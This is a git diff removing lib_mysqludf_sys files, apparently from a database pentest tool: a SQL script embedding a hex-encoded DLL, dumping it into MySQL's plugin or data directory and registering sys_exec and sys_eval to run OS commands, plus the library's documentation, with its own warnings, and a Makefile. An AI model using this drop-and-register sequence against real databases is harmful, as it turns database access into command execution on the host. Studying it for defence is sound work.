-CREATE TABLE udftest(data blob);
-
-
-- Insert the hexadecimal encoded UDF in the table
-- 
-- DLL compiled using MySQL 5.1.30 C libraries
-INSERT INTO udftest(data) VALUE (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000ad137127e9721f74e9721f74e9721f74e00a8c74eb721f74e00a8a74e8721f74e00a9c74e7721f74e00a9b74eb721f742a7d4274ea721f74e9721e74c0721f74e00a9674e8721f74e00a8d74e8721f74e00a8e74e8721f7452696368e9721f7400000000000000000000000000000000504500004c010300ce2e8e490000000000000000e00002210b010900001000000010000000600000507c0000007000000080000000000010001000000002000005000000000000000500000000000000009000000010000000000000020040010000100000100000000010000010000000000000100000007c830000b8010000b4820000c800000000800000b402000000000000000000000000000000000000348500001000000000000000000000000000000000000000000000000000000000000000000000001c7e00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000);
-UPDATE udftest SET data=CONCAT(data,0x000000000000000000000000800000e0555058310000000000100000007000000010000000040000000000000000000000000000400000e02e7273726300000000100000008000000006000000140000000000000000000000000000400000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332e303300555058210d090209285e83bd2629a7f017550000480c000000240000260000eb);
-UPDATE udftest SET data=CONCAT(data,0xffcbffff8b442408833800741956578b7c2414b90c00be000010e8f3a566a56edd92ff5fb0015ec332c0c3cc2f0c2ab907fbeddbcf26111c8bf8288b4c24182ca45fc7011e16f7cf0eac5e2ecc5f0175128b4004676430f76e750a2c04c6010155710a1db2d8f3113ca4723f8b484df7efbe021152ff15968083c40485c075084514c365dffeff8bc8568d71018a114184d275f98b54142bce890a4019bb6dba7f4c39026b74186d07b0df4b06688b419974158db6ae9d9d88f3fdc7b61100230c5d37f6df85048b108d44110250899859108d893c19a16b1990173c0611b05b4a68935fe70f464085ed767732740a890aff254aa0c31f6fdb42fb53568b745b1d78734602088b46f6eddb2fd18d5c39010a525157e8300c108b5617d6de65fb02c60407974e5104219d1c76fb36c95342d2c4185357220300ad6cae843f005f5e995bc34f9099c309830c20af0b03a8c35dc242dc0081ec10305bd7f85ba102200033c489842c0d8b0620dcdc373f8c2424538b9c241c07556a01db2038360214893d515397f0fcc7de6dd76863cc5033ff14948bd8538d4c24287063edae3251895c421688debe712b6c435355904c8d5001084084c9cb63bf5d2bc22e8d2c3b55563b848bf054dde6842f528d043eb48c24511334db70d8634f528bfd4d20c4b38b5ebf6d4678105d53189c803eb3c67436c6443b04fbee3eff0063eb038d);
-UPDATE udftest SET data=CONCAT(data,0x490068fc6c0d3f777b5f8901205e5bd8e633cc7e0375bceee17481c401c31418f4935f0f0fecad221bc602011e3b0d2275c60cfff602f3c3e90807318bff5668805fb778ffdd7e56c07c5959a3062358045485f67505dbb07be133c040748326004908ff270929098e36d6fde8c70424063b0b5923d2efddbffdff558bec51510a39450c750e39056b107e3cff7337deb51bb37d0cb50910488b096957897c6cdd770a23480f85d47d641718ec797677db6d5135202c893d50bb1e50eb184af0c1febba705f43bc7741768e803a8306a0057aedbdeb02ed63ae7eb07c72c013ca12feddeddf04c6a025e9d096a1f920aa6eb3caa10bcae7deffd04b4c7051f281aa0e027fdfbbeb3075cf120b004ac1b9a59893573a576e32b085939b2f26973dfeebdfb34393d155c741c68062809dc430dd8f65ae1ff751034252316fff1acb919be54ee01dc0801a1db76367b6378d665fc00dfdb0fd4ac3dc944fc83f80266d26dec1b1b595bffa0584b7031fb0e376daf45d70f8487c7195413a5bbb6401e8b141810897d563fb6f5edef043bc87251833f6cf36a74390774e92d3cdbdaff372620f8108907b9f8b8bd599b5615441b474df86bdf1adf900c394d1003d00874b4890902886db76d0c1a0860eba7f60c3d881163564d442e38200bdb5758064c32fc3f5079811d8e4390c9c2e96a1068cd7de37712d8d0d88bd2f28b5d08);
-UPDATE udftest SET data=CONCAT(data,0x1c548597ddede433c95cfc897d2008fc3bf15abfdb5a8c393a4417e4f906ea3bf07405db16defd83fe02752ea152dc3bc1749e565fd03b7066e1865ee4000393113bd983fbf1d2141680120ab22735bb61ebfe642464205750135e436cb60e002f52d2061137ecafd153f76a0375434f34871df66c032168742e2c257febe3ad81851b71ec3409aae050516468854be5ac1065e8f62fb65ddb70fad2feff001907032ae4a4ae3dee070b1dc396ec16ff3bf07885d3246a1b5419de5da07d54550c0d05f8595d38b4a1dc8a22e928035f2120e6e6e6cd43051c891518891d14893569b6efe610893d0c668c1838060d2c666996661d0805042558fbee96002d7ffc9c8f14309556ed9f3fdb240704288d4508348b85e0fca05d3b1b63aa7095011c1920c6d8d6b12413180958c0091cb32c9fbb6b608985d8320a04dc57e01bc3031834687edf8f7d9af1ec596af75010e00a20833dd83bac7d2000f923685b1b7c4f9fc0244928c9c380401ef292223b2e5f6a144a13001531e9b190aaf8a29cc6e107bf7359eb676a08a904598fedd61d921b27355934e0f5f31d6e85bf03e4507f4b7c8cad6d5f506efe1cdc142cd6e2c4582a5b09e01b14f46393e525db08dfdc6c0bfe73130ab9d94e1e43f7d81bc0fa36edde0359485d1656b807c8be0457e946c75f503bc6730f8b0753025083c7b3f21c567afe72f13025d0d0f68dd8);
-UPDATE udftest SET data=CONCAT(data,0x14cc632f08b84d5a287f57bac466b374045262413c03c18138501bfcfb974575ef33d2b90b011c48180f94b0c29a6209895d7f3fd748b65b81df31c80fb74114a20571063357c5c6d20de908180b76de7db5ffffdf8a0c3bf972098b580803d93bfb720a4283c0283bd672e86a1c0ed933d94e4f6afe9d17705c30d00635640cfc5083c3ad31ccec0823316033c56a7c86d277f064a31a892a46096877843e2c49f0d2094c7574559734cb645f2d1350198c083b41b8f05b2d24c1e81ff709e00183bbedd40a034f170059948be5ebd84e6a969701ca3da3c0fab216ec14972fbb3191b111bacc1e540540fcb8a491444ca312aa10dc9d5c87b1095f14c3a45cb4c7acfbef5400d75cb6d9968e6c038d2be0fafcc11a68cef13ca8fc8a039b0403710dc395707018679651481473e2e3ddcdd86903786851d70ab142efe19c56a30e68f885225b7cf892bf4ee640bb25eea0397866760d85c3255aa39f0a358e04eb60ca78116bed935d388b7598920bae0c32b640f007080c9dfed66e672710b4f4330c113bf77507be4fe0b768ef59eb0b85f30a95c1e0100bf0a1f4b147c200f7d607045e5f5bb43f1919191b5005585c60811d1919646ca4000004c84305038700feff50a1172f4e6f20617267756d656e7473ddffffdf096c6c6f77656420287564663a206c69625f6d7973716c0d5f3f32f7b773085f696e666f293918);
-UPDATE udftest SET data=CONCAT(data,0x20766572777fdbfe73696f6e20302e01331f45787065637447657861eddb6f6f076c79201a65207374723f672074791b806d6d6b7572617121722bb065013b7477911f3f1f30f7968672206e4148436f756cdbb6636f246e6f74c463611320186d27a204766e79af660048b5ffffe66e201712c0015253445360a91de01b43b243bdf182720ea1bdf958d103c502633a5c4476476e6efb6edb8a539674b0735c41646d0769bed6fe7f6b938e2e57324b335354454e5550444106336d7bfbf665736b16705c7368c9655c762675be23a1b9ff5f6370705f70726f6af83e6ccb3e65ff5c52656c65617365182e706462c97c2716c8351bc707d0674d259b0ff50707069d92c3bad303e727cc08e3e84ed8810fd81f0a6b037f56a82090209e2b1210008d4516c1beb119bf44ff003400301855ff01162100e9b03c53505c100103c0bf00c7456e7669726f6edbbb2fdb7f5661726961626c6541184743757272145072ecf640fe6f636573734964546805616413d61a001f5469636ba1150dbd01d0fe51756572795003c36d616ef6de5aac37160e184469735937ffcbdf7e4c6962726a7943616c6c73497344656275676765db63ae9572685c96556e684064626f6f6f3164457846707469a146696c4adb52b6c219b4125417c9da0640a0611e11b65bdbbe49906c0c6b409d6d7087656bcd35e747517f77555122b6bb65091b);
-UPDATE udftest SET data=CONCAT(data,0x5c537973186d0bafbbd0ee2b41737365094c69ddeef634405f686974396d5f2e5fdffedaf6616d73670878110b646a753a5f666469fbb0f6bb760d5f4370705863b9b65f63721b05ec076164035f686f6f6b4bb800b6f62f636a835f1c75017c01a55f1d735ec16dce0a1f0a6c2164ad58b0adf02a17096e75131346982c0f652f5f3dd65cdbda723456fe6d1c187b0af67db1b7035f706f52296e1064687b2f80ef756c5e6d75a61bdcd696252cb3066ed633b8ed19d82508661167efbd83db5a9ce4790835c7b73773ad32c06e4d0fd76f737bcd950d75667216232e00ffffff1f19274b254920211c2f63183427310c0917251217136517090705160cbffdffff1e080a0b160918181505061b050c10060717062105110f061421110b93efffdb082b2205070d111d0d18532d4838060007d9fead950848330a090b0c0510051616f76fff760e0b34150b18160d3d0542b605121e14066932c7dae67f110c0e1d4d0517230d0c24082400f0a2410be2ff042804f0280104e008041cca0fab7f43d64c010500ce2e8e4938e000642160f902210b01090e6612f6bdc972121710090b021ed27cb3c905070360045bf6deef32f61e40012a0207069fb9dc062703b7013c230f40e7a6cc6c4fb000500227ec40565dc0771cd9d0214207926e59002fac2e746c36d8e66578741a0c900eb74260ddd287602e72647661ab08fb6b);
-UPDATE udftest SET data=CONCAT(data,0x0e5bc20a1302402e2649d374dffe032730021c0bd6b84dc04f737235ebb0d10860df731e4f4dc920cdcd5e4f980150223e72fb4d421b242412a052445300000000000000000900ff0000000000000000807c2408010f85b901000060be007000108dbe00a0ffff5783cdffeb0d9090908a064688074701db75078b1e83eefc11db72edb80100000001db75078b1e83eefc11db11c001db73ef75098b1e83eefc11db73e431c983e803720dc1e0088a064683f0ff747489c501db75078b1e83eefc11db11c901db75078b1e83eefc11db11c975204101db75078b1e83eefc11db11c901db73ef75098b1e83eefc11db73e483c10281fd00f3ffff83d1018d142f83fdfc760f8a02428807474975f7e963ffffff908b0283c204890783c70483e90477f101cfe94cffffff5e89f7b92a0000008a07472ce83c0177f7803f0075f28b078a5f0466c1e808c1c01086c429f880ebe801f0890783c70588d8e2d98dbe005000008b0709c0743c8b5f048d8430b472000001f35083c708ff96f0720000958a074708c074dc89f95748f2ae55ff96f472000009c07407890383c304ebe16131c0c20c0083c7048d5efc31c08a074709c074223cef771101c38b0386c4c1c01086c401f08903ebe2240fc1e010668b0783c702ebe28baef87200008dbe00f0ffffbb0010000050546a045357ffd58d870f02000080207f8060287f585054);
-UPDATE udftest SET data=CONCAT(data,0x505357ffd558618d4424806a0039c475fa83ec80e9f998ffff00000048000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300010c02200100100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000);
-UPDATE udftest SET data=CONCAT(data,0x0000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005c80000056020000e404000000000000584000003c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f6e3d22312e30223e0d0a20203c7472757374496e666f20786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e7633223e0d0a202020203c73656375726974793e0d0a2020202020203c72657175657374656450726976696c656765733e0d0a20202020202020203c726571756573746564457865637574696f6e4c6576656c206c6576656c3d226173496e766f6b6572222075694163636573733d2266616c7365223e3c2f726571756573746564457865637574696f6e4c6576656c3e0d0a2020202020203c2f72657175657374656450726976696c656765733e0d0a202020203c2f73656375726974793e0d0a20203c2f7472757374496e666f3e0d0a20203c646570656e64656e63793e0d0a202020203c646570656e64656e74417373656d626c793e0d0a2020202020203c617373656d626c794964656e7469747920747970653d2277696e333222206e616d653d224d);
-UPDATE udftest SET data=CONCAT(data,0x6963726f736f66742e564339302e435254222076657273696f6e3d22392e302e32313032322e38222070726f636573736f724172636869746563747572653d2278383622207075626c69634b6579546f6b656e3d2231666338623362396131653138653362223e3c2f617373656d626c794964656e746974793e0d0a202020203c2f646570656e64656e74417373656d626c793e0d0a20203c2f646570656e64656e63793e0d0a3c2f617373656d626c793e504100000000000000000000000010830000f08200000000000000000000000000001d83000008830000000000000000000000000000000000000000000028830000368300004683000056830000648300000000000072830000000000004b45524e454c33322e444c4c004d5356435239302e646c6c00004c6f61644c69627261727941000047657450726f634164647265737300005669727475616c50726f7465637400005669727475616c416c6c6f6300005669727475616c46726565000000667265650000000000000000ca2e8e49000000003a840000010000000f0000000f000000a4830000e08300001c840000301000004012000000100000501200004012000010120000f01100004012000010120000a010000040120000601000009011000070110000e01000004f84000065840000828400009d840000a6840000b6840000c4840000cd840000);
-UPDATE udftest SET data=CONCAT(data,0xdd840000eb840000f3840000028500000f850000178500002685000000000100020003000400050006000700080009000a000b000c000d000e006c69625f6d7973716c7564665f7379732e646c6c006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f6576616c007379735f6576616c5f6465696e6974007379735f6576616c5f696e6974007379735f65786563007379735f657865635f6465696e6974007379735f657865635f696e6974007379735f676574007379735f6765745f6465696e6974007379735f6765745f696e6974007379735f736574007379735f7365745f6465696e6974007379735f7365745f696e6974000000700000100000005d3c583e5c3e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000);
-
-
-- Export the hexadecimal encoded UDF to a binary file on the file system
-- 
-- On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0:
-- 
-- From MySQL 5.1 and 6.0 official documentation:
-- 
--      shared_library_name is the basename of the shared object file
--      that contains the code that implements the function. The file 
--      must be located in the plugin directory. This directory is given
--      by the value of the plugin_dir system variable.
-- 
-- The DLL must be in can be in C:\Program Files\MySQL\MySQL Server M.m\lib\plugin
-- 
-- Note that C:\Program Files\MySQL\MySQL Server M.m\lib\plugin DOES NOT
-- exist by default so it is NOT possible to save the DLL in the proper
-- folder where MySQL server looks for DLLs.
-- 
-- References:
-- http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html
-- http://dev.mysql.com/doc/refman/6.0/en/create-function-udf.html
-- 
-- The DLL can be only in C:\Program Files\MySQL\MySQL Server M.n\lib\plugin
-- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/lib_mysqludf_sys.dll'; -- On MySQL 5.1 >= 5.1.19
-- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 6.0/lib/plugin/lib_mysqludf_sys.dll'; -- On MySQL 6.0
-- 
-- On MySQL 4.1 < 4.1.25, MySQL 5.0 < 5.0.67 and MySQL 5.1 < 5.1.19:
-- 
-- From MySQL 4.1 and 5.0 official documentation:
-- 
--      shared_library_name is the basename of the shared object file
--      that contains the code that implements the function. As of MySQL
--      M.m.m, the file must be located in the plugin directory. This
--      directory is given by the value of the plugin_dir system variable.
--      If the value of plugin_dir is empty, the behavior that is used
--      before M.m.m applies: The file must be located in a directory
--      that is searched by your system's dynamic linker.
-- 
-- References:
-- http://dev.mysql.com/doc/refman/4.1/en/create-function-udf.html
-- http://dev.mysql.com/doc/refman/5.0/en/create-function-udf.html
-- 
-- The DLL can be in either C:\WINDOWS, C:\WINDOWS\system,
-- C:\WINDOWS\system32, @@basedir\bin or @@datadir (tested on MySQL 4.1.22
-- and MySQL 5.0.67 with NO plugin_dir set in my.ini configuration file,
-- which is the default setting)
-- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 4.1/data/lib_mysqludf_sys.dll'; -- On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
-- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.0/data/lib_mysqludf_sys.dll'; -- On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
-- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.1/data/lib_mysqludf_sys.dll'; -- On MySQL 5.1 < 5.1.19 with NO plugin_dir set in my.ini configuration file
-- 
-- Notes:
-- If the library file already exists, the user SYSTEM does not have access
-- to overwrite it
-- The following enumerates the MySQL data directory
-- SELECT @@datadir
-- The followings will save into @@datadir. It is a valid PATH where MySQL
-- looks for DLL
-SELECT data FROM udftest INTO DUMPFILE './lib_mysqludf_sys.dll';
-- The followings will save into @@datadir\mysql where 'mysql' is the
-- database name where it is connected. It is not a valid PATH where MySQL
-- looks for DLL
-- SELECT data FROM udftest INTO DUMPFILE 'lib_mysqludf_sys.dll';
-- SELECT data FROM udftest INTO DUMPFILE '\lib_mysqludf_sys.dll';
-- The following will save into C:\. It is not a valid PATH where MySQL
-- looks for DLL
-- SELECT data FROM udftest INTO DUMPFILE '/lib_mysqludf_sys.dll';
-
-
-- Create two functions from the binary UDF file
-- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
-- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
-
-
-- Test the two functions
-SELECT sys_exec('echo test > %TEMP%/lib_mysqludf_sys.txt'); -- %TEMP% path is C:\WINDOWS\Temp
-SELECT sys_eval('echo %TEMP% && whoami');
-
-
-- Cleanup the file system and the database
-SELECT sys_exec('del %TEMP%/lib_mysqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
-- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
-- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0
--- a/extra/mysqludfsys/lib_mysqludf_sys/doc/lib_mysqludf_sys.html
+++ b/extra/mysqludfsys/lib_mysqludf_sys/doc/lib_mysqludf_sys.html
@@ -1,278 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" ?>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-<link rel="stylesheet" type="text/css" href="../mysqludf.css"/>
-<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
-<title>lib_mysqludf_sys - A library of MySQL UDFs for working with the environment in which MySQL runs</title>
-</head>
-<body>
-	<div>
-		<a href="../index.html">Top</a>
-	|	<a href="../mysql_udf_repository_libraries.html">Up</a>
-	</div>
-	<h1>lib_mysqludf_sys</h1>
-	<div>
-		<a href="lib_mysqludf_sys.html">Documentation</a>
-	|	<a href="lib_mysqludf_sys.so">Binary</a>
-	|	<a href="lib_mysqludf_sys.sql">Installation</a>
-	|	<a href="lib_mysqludf_sys.c">Source</a>
-	|	<a href="lib_mysqludf_sys_0.0.2.tar.gz">tar.gz</a>
-	</div>
-	<p>
-		This library <code>lib_mysqludf_sys</code> contains a number of functions that allows one to interact with the operating system.		
-	</p>
-	<ol>
-		<li><a href="#sys_eval"><code>sys_eval</code></a> - executes an arbitrary command, and returns it's output.</li>
-		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and returns it's exit code.</li>
-		<li><a href="#sys_get"><code>sys_get</code></a> - gets the value of an environment variable.</li>
-		<li><a href="#sys_set"><code>sys_set</code></a> - create an environment variable, or update the value of an existing environment variable.</li>
-	</ol>
-	<p>
-		Use <a href="#lib_mysqludf_sys_info"><code>lib_mysqludf_sys_info()</code></a> to obtain information about the currently installed version of <code>lib_mysqludf_sys</code>.
-	</p>
-	
-
-	<a name="sys_eval"></a><h2>sys_eval</h2>
-	<p>
-		<code>sys_eval</code> takes one command string argument and executes it, returning its output.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_eval(<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A command string valid for the current operating system or execution environment.
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			Whatever output the command pushed to the standard output stream.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_eval;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-		exposing the function poses a very real security hazard.
-	</p>
-	<p>
-		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-		The call will be executed with the privileges of the os user that runs MySQL, 
-		so it is entirely feasible to delete MySQL's data directory, or worse.		
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-		Currently, we do not have UDF's for ftp, email and http, 
-		and this function can be used to implement such functionality in case it is really necessary
-		(datawarehouse staging areas could be a case in example).
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<p>
-                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-	</p>
-
-	<a name="sys_exec"></a><h2>sys_exec</h2>
-	<p>
-		<code>sys_exec</code> takes one command string argument and executes it.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_exec(<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A command string valid for the current operating system or execution environment.
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			An (integer) exit code returned by the executed process.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_exec;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-		exposing the function poses a very real security hazard.
-	</p>
-	<p>
-		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-		The call will be executed with the privileges of the os user that runs MySQL, 
-		so it is entirely feasible to delete MySQL's data directory, or worse.		
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-		Currently, we do not have UDF's for ftp, email and http, 
-		and this function can be used to implement such functionality in case it is really necessary
-		(datawarehouse staging areas could be a case in example).
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<p>
-                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-	</p>
-	<a name="sys_get"></a><h2>sys_get</h2>
-	<p>
-		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_get([<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A string that denotes the name of an environment value.			
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			If the variable exists, a string containing the value of the environment variable.
-			If the variable does not exist, the function return NULL.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_get RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_get;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		The variables known in the environment where mysql runs are freely accessible using this function.
-		Any user can get access to potentially secret information, such as
-		the user that is running mysqld, the path of the user's home directory etc.
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<a name="sys_set"></a><h2>sys_set</h2>
-	<p>
-		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_set([<b>arg1, arg2</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A string that denotes the name of an environment value.			
-		</dd>
-		<dt><code><b>arg2</b></code></dt>
-		<dd>
-			An expression that contains the value that is to be assigned to the environment variable.			
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			0 if the assignment or creation succeed.
-			non-zero otherwise.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_set RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_set;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		This function will overwrite existing environment variables.
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-</body>
-</html
--- a/extra/mysqludfsys/lib_mysqludf_sys/linux/Makefile
+++ b/extra/mysqludfsys/lib_mysqludf_sys/linux/Makefile
@@ -1,6 +0,0 @@
-LIBDIR=/usr/lib
-
-install:
-	gcc -Wall -I/usr/include/mysql -O1 -shared src/lib_mysqludf_sys.c -o so/lib_mysqludf_sys.so
-	strip -sx so/lib_mysqludf_sys.so
-	sudo cp -f so/lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so
--- a/extra/mysqludfsys/lib_mysqludf_sys/linux/so/lib_mysqludf_sys.so
+++ b/extra/mysqludfsys/lib_mysqludf_sys/linux/so/lib_mysqludf_sys.so
--- a/extra/mysqludfsys/lib_mysqludf_sys/windows/dll/lib_mysqludf_sys.dll
+++ b/extra/mysqludfsys/lib_mysqludf_sys/windows/dll/lib_mysqludf_sys.dll
--- a/extra/mysqludfsys/lib_mysqludf_sys/windows/lib_mysqludf_sys.sql
+++ b/extra/mysqludfsys/lib_mysqludf_sys/windows/lib_mysqludf_sys.sql
@@ -1,35 +0,0 @@
-/*
-        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-        Copyright (C) 2007  Roland Bouman
-        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-        web: http://www.mysqludf.org/
-        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
-
-        This library is free software; you can redistribute it and/or
-        modify it under the terms of the GNU Lesser General Public
-        License as published by the Free Software Foundation; either
-        version 2.1 of the License, or (at your option) any later version.
-
-        This library is distributed in the hope that it will be useful,
-        but WITHOUT ANY WARRANTY; without even the implied warranty of
-        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-        Lesser General Public License for more details.
-
-        You should have received a copy of the GNU Lesser General Public
